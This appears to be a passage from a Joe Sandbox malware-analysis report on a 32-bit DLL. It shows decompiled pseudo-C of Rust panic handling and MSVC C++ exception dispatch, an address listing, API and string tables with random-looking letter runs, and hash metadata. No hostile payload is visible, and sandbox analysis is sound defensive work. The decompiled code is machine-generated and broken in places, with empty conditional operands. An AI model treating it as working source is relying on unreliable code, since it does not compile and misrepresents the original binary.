									_t332 = _v60;
									_t303 = _v64;
									__eflags = _t332 - 4;
									if(_t332 == 4) {
										__eflags =  *_t251 - 0x6c6c7566;
										if( *_t251 != 0x6c6c7566) {
											L84:
											_t340 = 2;
											_t271 = 0;
											__eflags = 0;
											L85:
											__eflags = _t303;
											if(_t303 != 0) {
												HeapFree( *0x6ed1e128, 0, _t251);
											}
											L87:
											__eflags = _t271 - 5;
											_t316 = _a8;
											_t273 =  !=  ? _t340 : 1;
											_t280 =  !=  ? _t271 & 0x000000ff : 4;
											_t144 =  !=  ? _t340 : 1;
											_t268 =  *0x6ed1e110;
											 *0x6ed1e110 =  !=  ? _t340 : 1;
											L20:
											_v148 = _t316;
											_v128 = _t280;
											_t61 = _t337 + 0xc; // 0x6ecd3290
											_t199 =  *_t61;
											_v40 = _t199;
											_t200 =  *_t199(_v36);
											_t348 = _t348 + 4;
											_t318 = _t316 ^ 0x7ef2a91e | _t200 ^ 0xecc7bcf4;
											__eflags = _t318;
											if(__eflags != 0) {
												_t202 = _v40(_v36);
												_t348 = _t348 + 4;
												__eflags = _t318 ^ 0xe43a67d8 | _t202 ^ 0xbae7a625;
												if(__eflags != 0) {
													goto L63;
												}
												_t254 = _v36;
												_t281 =  *_t254;
												_t204 = _t254[2];
												goto L22;
											}
											_t255 = _v36;
											_t281 =  *_t255;
											_t204 = _t255[1];
											goto L22;
										}
										_t271 = 1;
										_t340 = 3;
										goto L85;
									}
									__eflags = _t332 - 1;
									if(_t332 != 1) {
										goto L84;
									}
									__eflags =  *_t251 - 0x30;
									if( *_t251 != 0x30) {
										goto L84;
									}
									_t271 = 4;
									_t340 = 1;
									goto L85;
								}
								_t207 = GetProcessHeap();
								__eflags = _t207;
								if(__eflags == 0) {
									goto L68;
								}
								 *0x6ed1e128 = _t207;
								goto L67;
							} else {
								_t340 = _t197;
								__eflags = _t197 - 1;
								if(_t197 != 1) {
									L76:
									_t282 =  *(_t340 + 8);
									__eflags =  *_t340;
									_t138 = _t340 + 4; // 0x4
									_t337 = _t138;
									 *_t340 = 1;
									 *(_t340 + 4) = 0;
									 *(_t340 + 8) = 0;
									if(__eflags != 0) {
										__eflags = _t282;
										if(__eflags != 0) {
											asm("lock dec dword [ecx]");
											if(__eflags == 0) {
												_t197 = E6ECCC640(_t282);
											}
										}
									}
									goto L27;
								}
								_v84 = 0;
								_v36 = 0;
								_t213 = 0;
								__eflags = 0;
								goto L48;
							}
						} else {
							_t337 = _t197;
							if( *_t197 != 1) {
								goto L43;
							}
							_t337 = _t337 + 4;
							L27:
							if( *_t337 != 0) {
								E6ECE95A0(_t268, "already borrowedC:cmfltobzsqiwzwswifceeeiuunqkihdnyjizwfcsrqtsqkmwekwaanfzackndqagesnhktvjovmkrgyplrusstvgwloxgtnnoxmtpmkzzsudqjpdkuwbmncfcubd", 0x10, __eflags,  &_v68, 0x6ed0f860, 0x6ed0ff30);
								_t348 = _t348 + 0xc;
								goto L62;
							}
							 *_t337 = 0xffffffff;
							_t340 =  *(_t337 + 4);
							if(_t340 == 0) {
								_v36 = _t337;
								_v20 = 8;
								_t250 = E6ECCC4D0(_t268, _t337, _t340);
								_t337 = _v36;
								_t340 = _t250;
								_t197 =  *(_t337 + 4);
								_t359 = _t197;
								if(_t359 != 0) {
									asm("lock dec dword [eax]");
									if(_t359 == 0) {
										_t285 =  *(_t337 + 4);
										_t197 = E6ECCC640(_t285);
									}
								}
								 *(_t337 + 4) = _t340;
							}
							asm("lock inc dword [esi]");
							if(_t359 <= 0) {
								L17:
								asm("ud2");
								asm("ud2");
								goto L18;
							} else {
								 *_t337 =  *_t337 + 1;
								_v84 = _t340;
								_v36 = _t340;
								if(_t340 != 0) {
									_t212 =  *(_t340 + 0x10);
									__eflags = _t212;
									_t285 =  ==  ? _t212 : _t340 + 0x10;
									__eflags = _t285;
									if(__eflags != 0) {
										L104:
										_t213 =  *_t285;
										_t285 =  *((intOrPtr*)(4 + _t285)) - 1;
										L105:
										_v20 = 3;
										L48:
										_v124 = 0x6ed1010c;
										_v120 = 4;
										_v72 = 0;
										_v88 = 0;
										_v92 = 0;
										_v116 = 0;
										_v20 = 3;
										_t323 =  !=  ? _t213 : "<unnamed>thread \'\' panicked at \'\', ";
										_t215 =  !=  ? _t285 : 9;
										_v80 =  !=  ? _t213 : "<unnamed>thread \'\' panicked at \'\', ";
										_t324 =  &_v124;
										_v76 =  !=  ? _t285 : 9;
										_v68 =  &_v80;
										_v64 = 0x6eccdca0;
										_v60 =  &_v100;
										_v56 = 0x6eccdca0;
										_v52 =  &_v148;
										_v48 = E6ECCDCC0;
										_v108 =  &_v68;
										_v104 = 3;
										if(E6ECCD0F0( &_v92, _t213) == 3) {
											_v20 = 7;
											_v40 = _t324;
											 *((intOrPtr*)( *((intOrPtr*)(_t324 + 4))))( *_t324);
											_t348 = _t348 + 4;
											_t343 = _v40;
											_t300 =  *((intOrPtr*)(_t343 + 4));
											if( *((intOrPtr*)(_t300 + 4)) != 0) {
												_t248 =  *_t343;
												if( *((intOrPtr*)(_t300 + 8)) >= 9) {
													_t248 =  *(_t248 - 4);
												}
												HeapFree( *0x6ed1e128, 0, _t248);
											}
											HeapFree( *0x6ed1e128, 0, _t343);
										}
										_t269 = _v128;
										_t222 =  <  ? (_t269 + 0x000000fd & 0x000000ff) + 1 : 0;
										if(_t222 == 0) {
											__imp__AcquireSRWLockExclusive(0x6ed1e10c);
											_v68 = 0x6ed0fad0;
											_v64 = 1;
											_v152 = 0x6ed1e10c;
											_v41 = _t269;
											_v60 = 0;
											_v20 = 6;
											_v124 =  &_v41;
											_v120 = E6ECCDD30;
											_v52 =  &_v124;
											_v48 = 1;
											_t225 = E6ECCD0F0( &_v92, __eflags);
											_t341 =  &_v68;
											__imp__ReleaseSRWLockExclusive(0x6ed1e10c);
											__eflags = _t225 - 3;
											if(__eflags != 0) {
												goto L95;
											}
											_v20 = 5;
											_v40 = _t341;
											 *((intOrPtr*)( *((intOrPtr*)(_t341 + 4))))( *_t341);
											_t348 = _t348 + 4;
											goto L90;
										} else {
											if(_t222 == 1) {
												L95:
												_t372 = _v36;
												if(_t372 != 0) {
													asm("lock dec dword [eax]");
													if(_t372 == 0) {
														E6ECCC640(_v84);
													}
												}
												_t342 = _v140;
												_t338 = _v136;
												_t373 = _v72;
												if(_t373 != 0) {
													asm("lock dec dword [eax]");
													if(_t373 == 0) {
														E6ECCDA70(_v72);
													}
												}
												__imp__ReleaseSRWLockShared(0x6ed1e11c);
												_t374 = _v132 - 1;
												_v20 = 0xffffffff;
												if(_v132 > 1) {
													_v68 = 0x6ed1029c;
													_v64 = 1;
													_v60 = 0;
													_v52 = 0x6ed0f570;
													_v76 = 0;
													_v80 = 0;
													_v48 = 0;
													_t229 = E6ECCD0F0( &_v80, _t374);
													_v120 =  &_v68;
													_v124 = _t229;
													E6ECCD2B0( &_v124);
													asm("ud2");
													asm("ud2");
												}
												_t285 = _t338;
												E6ECCD290(_t285, _t342);
												asm("ud2");
												goto L104;
											}
											 *0x6ed1d040 = 0;
											_t368 =  *0x6ed1d040;
											if( *0x6ed1d040 == 0) {
												goto L95;
											}
											_t330 =  &_v68;
											_v68 = 0x6ed1017c;
											_v64 = 1;
											_v60 = 0;
											_v52 = 0x6ed0f570;
											_v48 = 0;
											_v20 = 3;
											if(E6ECCD0F0( &_v92, _t368) != 3) {
												goto L95;
											}
											_v40 = _t330;
											_v20 = 4;
											 *((intOrPtr*)( *((intOrPtr*)(_t330 + 4))))( *_t330);
											_t348 = _t348 + 4;
											L90:
											_t296 =  *((intOrPtr*)(_v40 + 4));
											if( *((intOrPtr*)(_t296 + 4)) != 0) {
												_t238 =  *_v40;
												if( *((intOrPtr*)(_t296 + 8)) >= 9) {
													_t238 =  *(_t238 - 4);
												}
												HeapFree( *0x6ed1e128, 0, _t238);
											}
											HeapFree( *0x6ed1e128, 0, _v40);
											goto L95;
										}
									}
									_t213 = 0;
									goto L105;
								}
								_t213 = 0;
								goto L48;
							}
						}
					}
				}
			}

0x6eccc6d7
0x6eccc6da
0x6eccc6de
0x6eccc6e5
0x6eccc6e6
0x6eccc6e8
0x6eccc6ed
0x6eccc6f0
0x6eccc6f2
0x6eccc6f3
0x6eccc6f4
0x6eccc6f5
0x6eccc6f6
0x6eccc6f7
0x6eccc6f8
0x6eccc6f9
0x6eccc6fa
0x6eccc6fb
0x6eccc6fc
0x6eccc6fd
0x6eccc6fe
0x6eccc6ff
0x6eccc706
0x6eccc70c
0x6eccc70f
0x6eccc716
0x6eccc71d
0x6eccc722
0x6eccc727
0x6eccc730
0x6eccc733
0x6eccc739
0x6eccc741
0x6eccc746
0x6eccc748
0x6eccc762
0x6eccc767
0x6eccc76a
0x6eccc76a
0x6eccc76e
0x6eccc771
0x6eccc774
0x6eccc776
0x6eccc7ea
0x6eccc7ed
0x6eccc84a
0x6eccc851
0x6eccc85b
0x6eccc862
0x6eccc869
0x6eccc86d
0x6eccc874
0x6eccc87b
0x6eccc881
0x6eccc884
0x6eccc887
0x6eccc88d
0x6eccc894
0x6eccc897
0x6eccc89e
0x6eccc8a3
0x6eccc8a5
0x6eccc8ac
0x6eccc8b4
0x6eccc8b7
0x6eccc8b9
0x6eccc8bc
0x6eccc8bc
0x6eccc8bf
0x6eccc8c2
0x6eccc8c6
0x6eccc8dc
0x6eccc8dc
0x6eccc8ea
0x6eccc8ea
0x00000000
0x6eccc8a5
0x6eccc7f2
0x6eccc7f5
0x6eccc7fc
0x6eccc803
0x6eccc80a
0x6eccc811
0x6eccc815
0x6eccc81c
0x6eccc823
0x6eccc828
0x6eccc82a
0x00000000
0x6eccc830
0x6eccc835
0x6eccc83d
0x6eccc840
0x6eccc842
0x00000000
0x6eccc842
0x6eccc77d
0x6eccc77d
0x6eccc785
0x6eccc78b
0x6eccc795
0x6eccc79c
0x6eccc7a3
0x6eccc7a9
0x6eccc7ac
0x6eccc7af
0x6eccc7b2
0x6eccc7b5
0x6eccc7ba
0x6eccc7bd
0x6eccc7bf
0x6eccc8f3
0x6eccc8f3
0x6eccc8f6
0x6eccc8f8
0x6eccc9cb
0x6eccc9d0
0x6eccc9d3
0x6eccc9d6
0x6ecccbd7
0x00000000
0x6ecccbd7
0x6eccc9dc
0x6eccc9df
0x6ecccbd0
0x00000000
0x6ecccbd0
0x6eccc9e5
0x6eccc9e7
0x00000000
0x00000000
0x6eccc9f0
0x6eccc9f5
0x6eccc9f8
0x6eccc9fb
0x6eccc9fd
0x00000000
0x00000000
0x6eccca03
0x00000000
0x6eccca03
0x6eccc8fe
0x00000000
0x6eccc7c5
0x6eccc7dd
0x6eccc7e2
0x6ecccbfe
0x6ecccbfe
0x6ecccc00
0x6ecccc00
0x6ecccc05
0x6eccc933
0x6eccc933
0x6eccc936
0x6eccc939
0x6eccc940
0x6eccc942
0x6eccc947
0x6eccc947
0x6eccc94d
0x6eccc956
0x6eccca33
0x6eccca33
0x6eccca38
0x6eccca3a
0x6eccca3c
0x6eccca41
0x6eccca41
0x6eccca47
0x6eccca4d
0x6eccca4f
0x6ecccc0f
0x6ecccc14
0x6ecccc16
0x6ecccc26
0x6ecccc2b
0x6ecccc30
0x6ecccc32
0x6ecccc72
0x6ecccc78
0x6ecccc7f
0x6ecccc81
0x6ecccc86
0x6ecccc88
0x6ecccc8f
0x6ecccc92
0x6ecccc97
0x6ecccc97
0x6ecccc9c
0x00000000
0x6ecccc9c
0x6ecccc34
0x6ecccc3e
0x6ecccc43
0x6ecccc45
0x6ecccc45
0x6ecccc48
0x6ecccc4b
0x6ecccc4e
0x6eccccf8
0x6eccccfe
0x6ecccd09
0x6ecccd09
0x6ecccd0e
0x6ecccd0e
0x6ecccd10
0x6ecccd10
0x6ecccd12
0x6ecccd1d
0x6ecccd1d
0x6ecccd22
0x6ecccd22
0x6ecccd2d
0x6ecccd35
0x6ecccd38
0x6ecccd3b
0x6ecccd3b
0x6ecccd3b
0x6eccc901
0x6eccc901
0x6eccc907
0x6eccc90a
0x6eccc90a
0x6eccc910
0x6eccc913
0x6eccc915
0x6eccc923
0x6eccc923
0x6eccc925
0x6eccca0d
0x6eccca10
0x6eccca1e
0x6eccca20
0x00000000
0x00000000
0x6eccca26
0x6eccca29
0x6eccca2b
0x00000000
0x6eccca2b
0x6eccc92b
0x6eccc92e
0x6eccc930
0x00000000
0x6eccc930
0x6ecccd00
0x6ecccd02
0x00000000
0x6ecccd02
0x6ecccc54
0x6ecccc57
0x00000000
0x00000000
0x6ecccc5d
0x6ecccc60
0x00000000
0x00000000
0x6ecccc66
0x6ecccc68
0x00000000
0x6ecccc68
0x6ecccc18
0x6ecccc1d
0x6ecccc1f
0x00000000
0x00000000
0x6ecccc21
0x00000000
0x6eccca55
0x6eccca55
0x6eccca57
0x6eccca5a
0x6ecccca2
0x6ecccca2
0x6ecccca5
0x6ecccca8
0x6ecccca8
0x6eccccab
0x6eccccb1
0x6eccccb8
0x6eccccbf
0x6eccccc5
0x6eccccc7
0x6ecccccd
0x6eccccd0
0x6eccccd6
0x6eccccd6
0x6eccccd0
0x6eccccc7
0x00000000
0x6eccccbf
0x6eccca60
0x6eccca67
0x6eccca6e
0x6eccca6e
0x00000000
0x6eccca6e
0x6eccc95c
0x6eccc95f
0x6eccc961
0x00000000
0x00000000
0x6eccc967
0x6eccc96a
0x6eccc96d
0x6ecccbf6
0x6ecccbfb
0x00000000
0x6ecccbfb
0x6eccc973
0x6eccc979
0x6eccc97e
0x6eccc980
0x6eccc983
0x6eccc98a
0x6eccc98f
0x6eccc992
0x6eccc994
0x6eccc997
0x6eccc999
0x6eccc99b
0x6eccc99e
0x6eccc9a0
0x6eccc9a3
0x6eccc9a3
0x6eccc99e
0x6eccc9a8
0x6eccc9a8
0x6eccc9ab
0x6eccc9ae
0x6eccc8ef
0x6eccc8ef
0x6eccc8f1
0x00000000
0x6eccc9b4
0x6eccc9b4
0x6eccc9b8
0x6eccc9bb
0x6eccc9be
0x6ecccce0
0x6ecccce6
0x6ecccce8
0x6ecccce8
0x6ecccceb
0x6ecccea2
0x6ecccea2
0x6ecccea7
0x6ecccea8
0x6ecccea8
0x6eccca70
0x6eccca77
0x6eccca7e
0x6eccca85
0x6eccca8c
0x6eccca90
0x6eccca97
0x6eccca9e
0x6ecccaa5
0x6ecccaad
0x6ecccab0
0x6ecccab6
0x6ecccab9
0x6ecccabf
0x6ecccac5
0x6ecccacc
0x6ecccad5
0x6ecccadc
0x6ecccae2
0x6ecccae9
0x6ecccaec
0x6ecccafa
0x6ecccb01
0x6ecccb09
0x6ecccb0c
0x6ecccb0e
0x6ecccb11
0x6ecccb14
0x6ecccb1b
0x6ecccb1d
0x6ecccb23
0x6ecccb25
0x6ecccb25
0x6ecccb31
0x6ecccb31
0x6ecccb3f
0x6ecccb3f
0x6ecccb44
0x6ecccb55
0x6ecccb5a
0x6ecccd4b
0x6ecccd5a
0x6ecccd61
0x6ecccd68
0x6ecccd72
0x6ecccd75
0x6ecccd7c
0x6ecccd83
0x6ecccd89
0x6ecccd90
0x6ecccd93
0x6ecccd9a
0x6ecccd9f
0x6ecccda8
0x6ecccdae
0x6ecccdb1
0x00000000
0x00000000
0x6ecccdb8
0x6ecccdc0
0x6ecccdc3
0x6ecccdc5
0x00000000
0x6ecccb60
0x6ecccb63
0x6eccce00
0x6eccce03
0x6eccce05
0x6eccce07
0x6eccce0a
0x6eccce0f
0x6eccce0f
0x6eccce0a
0x6eccce17
0x6eccce1d
0x6eccce23
0x6eccce25
0x6eccce27
0x6eccce2a
0x6eccce2f
0x6eccce2f
0x6eccce2a
0x6eccce39
0x6eccce3f
0x6eccce43
0x6eccce4a
0x6eccce52
0x6eccce59
0x6eccce60
0x6eccce67
0x6eccce6e
0x6eccce72
0x6eccce79
0x6eccce80
0x6eccce88
0x6eccce8b
0x6eccce8e
0x6eccce93
0x6eccce95
0x6eccce95
0x6eccce97
0x6eccce9b
0x6ecccea0
0x00000000
0x6ecccea0
0x6ecccb6b
0x6ecccb71
0x6ecccb73
0x00000000
0x00000000
0x6ecccb7c
0x6ecccb7f
0x6ecccb86
0x6ecccb8d
0x6ecccb94
0x6ecccb9b
0x6ecccba2
0x6ecccbb0
0x00000000
0x00000000
0x6ecccbbb
0x6ecccbbe
0x6ecccbc6
0x6ecccbc8
0x6ecccdc8
0x6ecccdcb
0x6ecccdd2
0x6ecccddb
0x6ecccddd
0x6ecccddf
0x6ecccddf
0x6ecccdeb
0x6ecccdeb
0x6ecccdfb
0x00000000
0x6ecccdfb
0x6ecccb5a
0x6eccccf1
0x00000000
0x6eccccf1
0x6eccc9c4
0x00000000
0x6eccc9c4
0x6eccc9ae
0x6eccc956
0x6eccc7bf

APIs

Part of subcall function 6ECCC700: AcquireSRWLockShared.KERNEL32(6ED1E11C), ref: 6ECCC785

HeapFree.KERNEL32(00000000,00000000), ref: 6ECCC8DC
HeapFree.KERNEL32(00000000,?), ref: 6ECCC8EA
TlsGetValue.KERNEL32(00000000), ref: 6ECCC94D
HeapFree.KERNEL32(00000000,00000000), ref: 6ECCCB31
HeapFree.KERNEL32(00000000,?), ref: 6ECCCB3F

Strings

cannot access a Thread Local Storage value during or after destructionC:kqwvpwvvlwjdcfhskugiowpmgqvcpfwggcvmmylhvkfknbiwgoixhewssvmqfpwemyruhmqomiebebgwzyjtgnzgjfkbtcehpwhopimlufuwcaldobojssciqoa, xrefs: 6ECCC74D, 6ECCC7C8
Box<dyn Any><unnamed>thread '' panicked at '', , xrefs: 6ECCCC00

Memory Dump Source

Source File: 00000000.00000002.601171889.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000000.00000002.601163946.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601193192.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601219117.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.601225755.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.601231937.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ecc0000_loaddll32.jbxd

Similarity

API ID: FreeHeap$AcquireLockSharedValue
String ID: Box<dyn Any><unnamed>thread '' panicked at '', $cannot access a Thread Local Storage value during or after destructionC:kqwvpwvvlwjdcfhskugiowpmgqvcpfwggcvmmylhvkfknbiwgoixhewssvmqfpwemyruhmqomiebebgwzyjtgnzgjfkbtcehpwhopimlufuwcaldobojssciqoa
API String ID: 942675266-716947571
Opcode ID: 9de5f66f8793e648fc0e54e4cf271706549a221635fe8a8b286590f87f6895db
Instruction ID: 65d8dec711584d7bbdf26eb043d044f6b7e12fe16b604b5eb3c4aa6d1f40fc34
Opcode Fuzzy Hash: 9de5f66f8793e648fc0e54e4cf271706549a221635fe8a8b286590f87f6895db
Instruction Fuzzy Hash: 050214B0E002198FEB10CFE4C954BDEBBB5BF49704F208559D815AB384E775A986CF92

Uniqueness

Uniqueness Score: -1.00%

Function 6ECDF6F6, Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 64%

			E6ECDF6F6(signed int __edx, signed char* _a4, signed int _a8, signed int _a12, char _a16, signed int* _a20, signed int _a24, signed int _a28, signed int _a32) {
				signed char* _v0;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				void _v64;
				signed int _v68;
				char _v84;
				intOrPtr _v88;
				signed int _v92;
				intOrPtr _v100;
				void _v104;
				intOrPtr* _v112;
				signed char* _v184;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t202;
				signed int _t203;
				char _t204;
				signed int _t206;
				signed int _t208;
				signed char* _t209;
				signed int _t210;
				signed int _t211;
				signed int _t215;
				void* _t218;
				signed char* _t221;
				void* _t223;
				void* _t225;
				signed char _t229;
				signed int _t230;
				void* _t232;
				void* _t235;
				void* _t238;
				signed char _t245;
				signed int _t250;
				void* _t253;
				signed int* _t255;
				signed int _t256;
				intOrPtr _t257;
				signed int _t258;
				void* _t263;
				void* _t268;
				void* _t269;
				signed int _t273;
				signed char* _t274;
				intOrPtr* _t275;
				signed char _t276;
				signed int _t277;
				signed int _t278;
				intOrPtr* _t280;
				signed int _t281;
				signed int _t282;
				signed int _t287;
				signed int _t294;
				signed int _t295;
				signed int _t298;
				signed int _t300;
				signed char* _t301;
				signed int _t302;
				signed int _t303;
				signed int* _t305;
				signed char* _t308;
				signed int _t318;
				signed int _t319;
				signed int _t321;
				signed int _t330;
				void* _t332;
				void* _t334;
				void* _t335;
				void* _t336;
				void* _t337;

				_t300 = __edx;
				_push(_t319);
				_t305 = _a20;
				_v20 = 0;
				_v28 = 0;
				_t279 = E6ECE0658(_a8, _a16, _t305);
				_t335 = _t334 + 0xc;
				_v12 = _t279;
				if(_t279 < 0xffffffff || _t279 >= _t305[1]) {
					L66:
					_t202 = E6ECE1C23(_t274, _t279, _t300, _t305, _t319);
					asm("int3");
					_t332 = _t335;
					_t336 = _t335 - 0x38;
					_push(_t274);
					_t275 = _v112;
					__eflags =  *_t275 - 0x80000003;
					if( *_t275 == 0x80000003) {
						return _t202;
					} else {
						_push(_t319);
						_push(_t305);
						_t203 = E6ECDF3B1(_t275, _t279, _t300, _t305, _t319);
						__eflags =  *(_t203 + 8);
						if( *(_t203 + 8) != 0) {
							__imp__EncodePointer(0);
							_t319 = _t203;
							_t223 = E6ECDF3B1(_t275, _t279, _t300, 0, _t319);
							__eflags =  *((intOrPtr*)(_t223 + 8)) - _t319;
							if( *((intOrPtr*)(_t223 + 8)) != _t319) {
								__eflags =  *_t275 - 0xe0434f4d;
								if( *_t275 != 0xe0434f4d) {
									__eflags =  *_t275 - 0xe0434352;
									if( *_t275 != 0xe0434352) {
										_t215 = E6ECDEBF7(_t300, 0, _t319, _t275, _a4, _a8, _a12, _a16, _a24, _a28);
										_t336 = _t336 + 0x1c;
										__eflags = _t215;
										if(_t215 != 0) {
											L83:
											return _t215;
										}
									}
								}
							}
						}
						_t204 = _a16;
						_v28 = _t204;
						_v24 = 0;
						__eflags =  *(_t204 + 0xc);
						if( *(_t204 + 0xc) > 0) {
							_push(_a24);
							E6ECDEB2A(_t275, _t279, 0, _t319,  &_v44,  &_v28, _a20, _a12, _t204);
							_t302 = _v40;
							_t337 = _t336 + 0x18;
							_t215 = _v44;
							_v20 = _t215;
							_v12 = _t302;
							__eflags = _t302 - _v32;
							if(_t302 >= _v32) {
								goto L83;
							}
							_t281 = _t302 * 0x14;
							__eflags = _t281;
							_v16 = _t281;
							do {
								_t282 = 5;
								_t218 = memcpy( &_v64,  *((intOrPtr*)( *_t215 + 0x10)) + _t281, _t282 << 2);
								_t337 = _t337 + 0xc;
								__eflags = _v64 - _t218;
								if(_v64 > _t218) {
									goto L82;
								}
								__eflags = _t218 - _v60;
								if(_t218 > _v60) {
									goto L82;
								}
								_t221 = _v48 + 0xfffffff0 + (_v52 << 4);
								_t287 = _t221[4];
								__eflags = _t287;
								if(_t287 == 0) {
									L80:
									__eflags =  *_t221 & 0x00000040;
									if(( *_t221 & 0x00000040) == 0) {
										_push(0);
										_push(1);
										E6ECDF676(_t302, _t275, _a4, _a8, _a12, _a16, _t221, 0,  &_v64, _a24, _a28);
										_t302 = _v12;
										_t337 = _t337 + 0x30;
									}
									goto L82;
								}
								__eflags =  *((char*)(_t287 + 8));
								if( *((char*)(_t287 + 8)) != 0) {
									goto L82;
								}
								goto L80;
								L82:
								_t302 = _t302 + 1;
								_t215 = _v20;
								_t281 = _v16 + 0x14;
								_v12 = _t302;
								_v16 = _t281;
								__eflags = _t302 - _v32;
							} while (_t302 < _v32);
							goto L83;
						}
						E6ECE1C23(_t275, _t279, _t300, 0, _t319);
						asm("int3");
						_push(_t332);
						_t301 = _v184;
						_push(_t275);
						_push(_t319);
						_push(0);
						_t206 = _t301[4];
						__eflags = _t206;
						if(_t206 == 0) {
							L108:
							_t208 = 1;
							__eflags = 1;
						} else {
							_t280 = _t206 + 8;
							__eflags =  *_t280;
							if( *_t280 == 0) {
								goto L108;
							} else {
								__eflags =  *_t301 & 0x00000080;
								_t308 = _v0;
								if(( *_t301 & 0x00000080) == 0) {
									L90:
									_t276 = _t308[4];
									_t321 = 0;
									__eflags = _t206 - _t276;
									if(_t206 == _t276) {
										L100:
										__eflags =  *_t308 & 0x00000002;
										if(( *_t308 & 0x00000002) == 0) {
											L102:
											_t209 = _a4;
											__eflags =  *_t209 & 0x00000001;
											if(( *_t209 & 0x00000001) == 0) {
												L104:
												__eflags =  *_t209 & 0x00000002;
												if(( *_t209 & 0x00000002) == 0) {
													L106:
													_t321 = 1;
													__eflags = 1;
												} else {
													__eflags =  *_t301 & 0x00000002;
													if(( *_t301 & 0x00000002) != 0) {
														goto L106;
													}
												}
											} else {
												__eflags =  *_t301 & 0x00000001;
												if(( *_t301 & 0x00000001) != 0) {
													goto L104;
												}
											}
										} else {
											__eflags =  *_t301 & 0x00000008;
											if(( *_t301 & 0x00000008) != 0) {
												goto L102;
											}
										}
										_t208 = _t321;
									} else {
										_t185 = _t276 + 8; // 0x6e
										_t210 = _t185;
										while(1) {
											_t277 =  *_t280;
											__eflags = _t277 -  *_t210;
											if(_t277 !=  *_t210) {
												break;
											}
											__eflags = _t277;
											if(_t277 == 0) {
												L96:
												_t211 = _t321;
											} else {
												_t278 =  *((intOrPtr*)(_t280 + 1));
												__eflags = _t278 -  *((intOrPtr*)(_t210 + 1));
												if(_t278 !=  *((intOrPtr*)(_t210 + 1))) {
													break;
												} else {
													_t280 = _t280 + 2;
													_t210 = _t210 + 2;
													__eflags = _t278;
													if(_t278 != 0) {
														continue;
													} else {
														goto L96;
													}
												}
											}
											L98:
											__eflags = _t211;
											if(_t211 == 0) {
												goto L100;
											} else {
												_t208 = 0;
											}
											goto L109;
										}
										asm("sbb eax, eax");
										_t211 = _t210 | 0x00000001;
										__eflags = _t211;
										goto L98;
									}
								} else {
									__eflags =  *_t308 & 0x00000010;
									if(( *_t308 & 0x00000010) != 0) {
										goto L108;
									} else {
										goto L90;
									}
								}
							}
						}
						L109:
						return _t208;
					}
				} else {
					_t274 = _a4;
					if( *_t274 != 0xe06d7363 || _t274[0x10] != 3 || _t274[0x14] != 0x19930520 && _t274[0x14] != 0x19930521 && _t274[0x14] != 0x19930522) {
						L22:
						_t300 = _a12;
						_v8 = _t300;
						goto L24;
					} else {
						_t319 = 0;
						if(_t274[0x1c] != 0) {
							goto L22;
						} else {
							_t225 = E6ECDF3B1(_t274, _t279, _t300, _t305, 0);
							if( *((intOrPtr*)(_t225 + 0x10)) == 0) {
								L60:
								return _t225;
							} else {
								_t274 =  *(E6ECDF3B1(_t274, _t279, _t300, _t305, 0) + 0x10);
								_t263 = E6ECDF3B1(_t274, _t279, _t300, _t305, 0);
								_v28 = 1;
								_v8 =  *((intOrPtr*)(_t263 + 0x14));
								if(_t274 == 0 ||  *_t274 == 0xe06d7363 && _t274[0x10] == 3 && (_t274[0x14] == 0x19930520 || _t274[0x14] == 0x19930521 || _t274[0x14] == 0x19930522) && _t274[0x1c] == _t319) {
									goto L66;
								} else {
									if( *((intOrPtr*)(E6ECDF3B1(_t274, _t279, _t300, _t305, _t319) + 0x1c)) == _t319) {
										L23:
										_t300 = _v8;
										_t279 = _v12;
										L24:
										_v52 = _t305;
										_v48 = 0;
										__eflags =  *_t274 - 0xe06d7363;
										if( *_t274 != 0xe06d7363) {
											L56:
											__eflags = _t305[3];
											if(_t305[3] <= 0) {
												goto L59;
											} else {
												__eflags = _a24;
												if(_a24 != 0) {
													goto L66;
												} else {
													_push(_a32);
													_push(_a28);
													_push(_t279);
													_push(_t305);
													_push(_a16);
													_push(_t300);
													_push(_a8);
													_push(_t274);
													L67();
													_t335 = _t335 + 0x20;
													goto L59;
												}
											}
										} else {
											__eflags = _t274[0x10] - 3;
											if(_t274[0x10] != 3) {
												goto L56;
											} else {
												__eflags = _t274[0x14] - 0x19930520;
												if(_t274[0x14] == 0x19930520) {
													L29:
													_t319 = _a32;
													__eflags = _t305[3];
													if(_t305[3] > 0) {
														_push(_a28);
														E6ECDEB2A(_t274, _t279, _t305, _t319,  &_v68,  &_v52, _t279, _a16, _t305);
														_t300 = _v64;
														_t335 = _t335 + 0x18;
														_t250 = _v68;
														_v44 = _t250;
														_v16 = _t300;
														__eflags = _t300 - _v56;
														if(_t300 < _v56) {
															_t294 = _t300 * 0x14;
															__eflags = _t294;
															_v32 = _t294;
															do {
																_t295 = 5;
																_t253 = memcpy( &_v104,  *((intOrPtr*)( *_t250 + 0x10)) + _t294, _t295 << 2);
																_t335 = _t335 + 0xc;
																__eflags = _v104 - _t253;
																if(_v104 <= _t253) {
																	__eflags = _t253 - _v100;
																	if(_t253 <= _v100) {
																		_t298 = 0;
																		_v20 = 0;
																		__eflags = _v92;
																		if(_v92 != 0) {
																			_t255 =  *(_t274[0x1c] + 0xc);
																			_t303 =  *_t255;
																			_t256 =  &(_t255[1]);
																			__eflags = _t256;
																			_v36 = _t256;
																			_t257 = _v88;
																			_v40 = _t303;
																			_v24 = _t257;
																			do {
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				_t318 = _v36;
																				_t330 = _t303;
																				__eflags = _t330;
																				if(_t330 <= 0) {
																					goto L40;
																				} else {
																					while(1) {
																						_push(_t274[0x1c]);
																						_t258 =  &_v84;
																						_push( *_t318);
																						_push(_t258);
																						L86();
																						_t335 = _t335 + 0xc;
																						__eflags = _t258;
